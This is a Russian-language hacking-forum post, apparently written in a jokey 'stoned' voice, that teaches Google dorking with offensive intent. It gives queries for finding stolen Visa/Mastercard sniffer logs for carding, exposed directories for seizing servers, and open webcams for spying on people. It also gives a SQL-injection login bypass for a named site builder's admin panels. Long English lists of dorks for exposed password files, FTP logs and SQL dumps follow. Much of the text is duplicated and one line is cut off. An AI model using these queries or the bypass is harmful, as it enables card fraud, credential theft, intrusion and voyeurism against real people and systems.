всем привет! А, Вы писали когда нибудь статью под воздействием наркотиков? Нет..?
Предлогаю оценить сей данный Вам текст, ведь не даром психоделики и всякого рода химия так полюбилась творческим людям! Примеров куча....
Есть такой поисковик жужл, он все знает! Вы скажите да ну нах, что за наркоманский бред?
Ребятки я Вам отвечу забудте что Вы знали про него! Я наблюдал у нас на борде статьи про shoudan типо " самый лютый посковик" типо трепещите простые смертные перед ним, а нихуя жужлик круче!!
У Вас вопрос почему??? Отвечаю, ну вот вам захотелось оплатить что-нить в инете на себя на дропа не важно.. так вот Вам "заклинание" { intext: visa | mastercard siteastebin.com } и УКАЖИТЕ ВРЕМЯ ЗА ПОСЛЕДНЮЮ НЕДЕЛЮ В (ИНСТРУМЕНТАХ)
Я уверен что к Вашему вниманию представится очень много логов сниферов и всякого рода логов.. где есть полезная инфа! Согласитесь, в в хваленом Шоудане такого не найдешь?
Идем дальше, захотелось Вам например взломать что нить сервер для соксов майнинга и т.д. да и просто по баловать свое самолюбие.. есть заклинание
{ "dirLIST - PHP Directory Lister" "Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx" "index of" exthp } <<<-- Cтарички меня поймут, про что здесь!))
Продалжаем баловаться хотите Вы к примеру позырить на телок, на работников, на всякую шуету? вот Вам такое заклинание { inurl:/control/userimage.html } типо взлом webcamer))
Это все балавство, ничего серьезного! А вот теперь внимание всем представляю Вам заклинание {Powerd by NetOffica } поясняю эта группа создателей сайтов клепала в свае время сайты на право на лево))
абы збыть и закрыть заказ , безопасность им была по-уй.. абы денег срубить..), так вот они упустили момент такой- что в админ панель (ну вы знаете) можно зайти просто.
Username: '=' 'or'
password: '=' 'or'
и таких примеров я Вам могу предоставить кучу!
Итог учите google hacking! а именно @ля забыл..... как это слово называется индексы ......а точно "операторы" гугл !! (вспоминал 5 минут) ну и на последок ДАРЫ так сказать..))
Предлогаю оценить сей данный Вам текст, ведь не даром психоделики и всякого рода химия так полюбилась творческим людям! Примеров куча....
Есть такой поисковик жужл, он все знает! Вы скажите да ну нах, что за наркоманский бред?
Ребятки я Вам отвечу забудте что Вы знали про него! Я наблюдал у нас на борде статьи про shoudan типо " самый лютый посковик" типо трепещите простые смертные перед ним, а нихуя жужлик круче!!
У Вас вопрос почему??? Отвечаю, ну вот вам захотелось оплатить что-нить в инете на себя на дропа не важно.. так вот Вам "заклинание" { intext: visa | mastercard siteastebin.com } и УКАЖИТЕ ВРЕМЯ ЗА ПОСЛЕДНЮЮ НЕДЕЛЮ В (ИНСТРУМЕНТАХ)
Я уверен что к Вашему вниманию представится очень много логов сниферов и всякого рода логов.. где есть полезная инфа! Согласитесь, в в хваленом Шоудане такого не найдешь?
Идем дальше, захотелось Вам например взломать что нить сервер для соксов майнинга и т.д. да и просто по баловать свое самолюбие.. есть заклинание
{ "dirLIST - PHP Directory Lister" "Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx" "index of" exthp } <<<-- Cтарички меня поймут, про что здесь!))
Продалжаем баловаться хотите Вы к примеру позырить на телок, на работников, на всякую шуету? вот Вам такое заклинание { inurl:/control/userimage.html } типо взлом webcamer))
Это все балавство, ничего серьезного! А вот теперь внимание всем представляю Вам заклинание {Powerd by NetOffica } поясняю эта группа создателей сайтов клепала в свае время сайты на право на лево))
абы збыть и закрыть заказ , безопасность им была по-уй.. абы денег срубить..), так вот они упустили момент такой- что в админ панель (ну вы знаете) можно зайти просто.
Username: '=' 'or'
password: '=' 'or'
и таких примеров я Вам могу предоставить кучу!
Итог учите google hacking! а именно @ля забыл..... как это слово называется индексы ......а точно "операторы" гугл !! (вспоминал 5 минут) ну и на последок ДАРЫ так сказать..))
************************
** FTP PASSWORD DORKS **
************************
+htpasswd +WS_FTP.LOG filetype:log
"index of/" "ws_ftp.ini" "parent directory"
Substitute vulnerablesite.com with your site you want to search)
"allinurl: "Vulnerablesite.com" WS_FTP.LOG filetype:log"
*****************************
** SQL PASSWORD DUMP DORKS **
*****************************
1.) SQL dumps saved to database search. (Some of the more common passwords for you):
a.) "123456" = hashed password
ext:sql intextgmail.com intext:e10adc3949ba59abbe56e057f20f883e
b.) "654321" = hashed password
ext:sql intextgmail.com intext:c33367701511b4f6020ec61ded352059
c.) "password" = hashed password
ext:sql intextgmail.com intext:5f4dcc3b5aa765d61d8327deb882cf99
d.) "12345678" = hashed password
ext:sql intextgmail.com intext:25d55ad283aa400af464c76d713c07ad
e.) "iloveyou" = hashed password
ext:sql intextgmail.com intext:f25a2fc72690b780b2a14e140ef6a9e0
2.) Variation of above search:
a.) ext:sql intext:"INSERT INTO" intextgmail.com intextassword
b.) ext:sql intext:"INSERT INTO" intextyahoo.com intextassword
c.) ext:sql intext:"INSERT INTO" intexthotmail.com intextassword
d.) ext:sql intext:"INSERT INTO" intextatt.net intextassword
e.) ext:sql intext:"INSERT INTO" intextcomcast.net intextassword
f.) ext:sql intext:"INSERT INTO" intextverizon.net intextassword
*************************
** PASSWORD FILE DORKS **
*************************
1.) Search for Microsoft Excel data file:
"Login: *" "password =*" filetype: xls
2.) Search for auth_user_file:
allinurl: auth_user_file.txt
3.) Search for username/password saved in Microsoft Excel files:
filetype: xls inurl: "password.xls"
4.) Search for login pages:
intitle: login password
5.) Search for "master password" page:
intitle: "Index of" master.passwd
6.) Search for backup directory:
index of /backup
7.) Search for password backup file index:
intitle:index.of passwd.bak
8.) Search for password databases:
intitle:index.of pwd.db
intitle:"index of" pwd.db
9.) Search for /etc/passwd/ index:
intitle:"index of .. etc" passwd
10.) Search for plaintext password file:
index.of passlist.txt
inurlasslist.txt
11.) Search for hidden documents/password files:
index.of.secret
index.of.private
12.) Search for PhpMyAdmin files:
"# PhpMyAdmin MySQL-Dump" filetype: txt
13.) Hidden Superuser (root) data files:
inurl:ipsec.secrets-history-bugs
inurl:ipsec.secrets "holds shared secrets"
14.) Find the information files:
inurl:ipsec.conf-intitle:manpage
15.) Search for a stored password in a database:
filetype:ldb admin
16.) Search for admin.php file:
inurl:search/admin.php
17.) Search for password log files:
inurlassword.log filetype:log
18.) Search for Hkey_Current_User in registry files:
filetype: reg HKEY_CURRENT_USER username
19.) Search for username/password file backups:
"
20.) Search for username/password files:
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files
21.) Search for Microsoft Frontpage passwords:
extwd inurlservice|authors|administrators|users) “# -FrontPage-”
22.) Search for SQL database Code and passwords:
filetype: sql ( "passwd values ****" |" password values ****" | "pass values ****")
23.) Search for e-mail account files:
intitle: "Index Of"-inurl: maillog
** FTP PASSWORD DORKS **
************************
+htpasswd +WS_FTP.LOG filetype:log
"index of/" "ws_ftp.ini" "parent directory"
Substitute vulnerablesite.com with your site you want to search)
"allinurl: "Vulnerablesite.com" WS_FTP.LOG filetype:log"
*****************************
** SQL PASSWORD DUMP DORKS **
*****************************
1.) SQL dumps saved to database search. (Some of the more common passwords for you):
a.) "123456" = hashed password
ext:sql intextgmail.com intext:e10adc3949ba59abbe56e057f20f883e
b.) "654321" = hashed password
ext:sql intextgmail.com intext:c33367701511b4f6020ec61ded352059
c.) "password" = hashed password
ext:sql intextgmail.com intext:5f4dcc3b5aa765d61d8327deb882cf99
d.) "12345678" = hashed password
ext:sql intextgmail.com intext:25d55ad283aa400af464c76d713c07ad
e.) "iloveyou" = hashed password
ext:sql intextgmail.com intext:f25a2fc72690b780b2a14e140ef6a9e0
2.) Variation of above search:
a.) ext:sql intext:"INSERT INTO" intextgmail.com intextassword
b.) ext:sql intext:"INSERT INTO" intextyahoo.com intextassword
c.) ext:sql intext:"INSERT INTO" intexthotmail.com intextassword
d.) ext:sql intext:"INSERT INTO" intextatt.net intextassword
e.) ext:sql intext:"INSERT INTO" intextcomcast.net intextassword
f.) ext:sql intext:"INSERT INTO" intextverizon.net intextassword
*************************
** PASSWORD FILE DORKS **
*************************
1.) Search for Microsoft Excel data file:
"Login: *" "password =*" filetype: xls
2.) Search for auth_user_file:
allinurl: auth_user_file.txt
3.) Search for username/password saved in Microsoft Excel files:
filetype: xls inurl: "password.xls"
4.) Search for login pages:
intitle: login password
5.) Search for "master password" page:
intitle: "Index of" master.passwd
6.) Search for backup directory:
index of /backup
7.) Search for password backup file index:
intitle:index.of passwd.bak
8.) Search for password databases:
intitle:index.of pwd.db
intitle:"index of" pwd.db
9.) Search for /etc/passwd/ index:
intitle:"index of .. etc" passwd
10.) Search for plaintext password file:
index.of passlist.txt
inurlasslist.txt
11.) Search for hidden documents/password files:
index.of.secret
index.of.private
12.) Search for PhpMyAdmin files:
"# PhpMyAdmin MySQL-Dump" filetype: txt
13.) Hidden Superuser (root) data files:
inurl:ipsec.secrets-history-bugs
inurl:ipsec.secrets "holds shared secrets"
14.) Find the information files:
inurl:ipsec.conf-intitle:manpage
15.) Search for a stored password in a database:
filetype:ldb admin
16.) Search for admin.php file:
inurl:search/admin.php
17.) Search for password log files:
inurlassword.log filetype:log
18.) Search for Hkey_Current_User in registry files:
filetype: reg HKEY_CURRENT_USER username
19.) Search for username/password file backups:
"
Ссылка скрыта от гостей
: password @ www ..." filetype: bak inurl: "htaccess | passwd | shadow | ht users"20.) Search for username/password files:
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files
21.) Search for Microsoft Frontpage passwords:
extwd inurlservice|authors|administrators|users) “# -FrontPage-”
22.) Search for SQL database Code and passwords:
filetype: sql ( "passwd values ****" |" password values ****" | "pass values ****")
23.) Search for e-mail account files:
intitle: "Index Of"-inurl: maillog